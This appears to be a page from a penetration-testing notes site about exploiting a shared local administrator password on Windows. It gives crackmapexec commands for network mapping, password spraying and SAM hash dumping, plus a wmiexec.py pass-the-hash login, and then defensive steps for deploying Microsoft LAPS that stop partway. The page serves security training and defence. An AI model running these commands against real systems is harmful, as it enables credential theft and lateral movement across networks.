search
githubEdit

handshake-simpleShared Local Administrator Password

  • Typical used in Deployment Solutions

  • Easy for admins to login to various servers/machines when problem arises

  • Attackers can get hash on one machine and use it on all other machines

hashtag
Shared Administrator Password

Map the Local Network

crackmapexec smb 192.168.130.1/29

Spray Username and Password across the Network

crackmapexec smb 192.168.130.1/29 -u web1admin -p 'P@ssw0rd' -d trustedsec.int

Dump the SAM database for one specific host

crackmapexec smb 192.168.130.1/29 -u web1admin -p 'P@ssw0rd' -d trustedsec.int --sam

Access the Client using the hash found in previous step

wmiexec.py WORKGROUP/[email protected] -hashes <hash goes here>

hashtag
Countermeasures

  • One easy way of changing this is to use Local Administrator Password Solution (LAPS) from Microsoft.

  • Change who is allowed to login over the network.

hashtag

hashtag
LAPS and Preventing over the network login with local accounts

hashtag
In The Domain Controller Machine

  • Visit: https://aka.ms/lapsarrow-up-right

  • Download: LAPS.x64.msi

  • Installation Steps

    • Select AdmPwd GPO Extension as Entire feature will be unavailable

    • Select Management Tools as Entire feature will be installed on local hard drive

    • Select Fat client UI as Entire feature will be unavailable

hashtag
After Installation of LAPS

  • Open Powershell

Import the Module we have just installed

PreviousWindows and Active Directory AttacksNextNTLM/SMB Relay

Last updated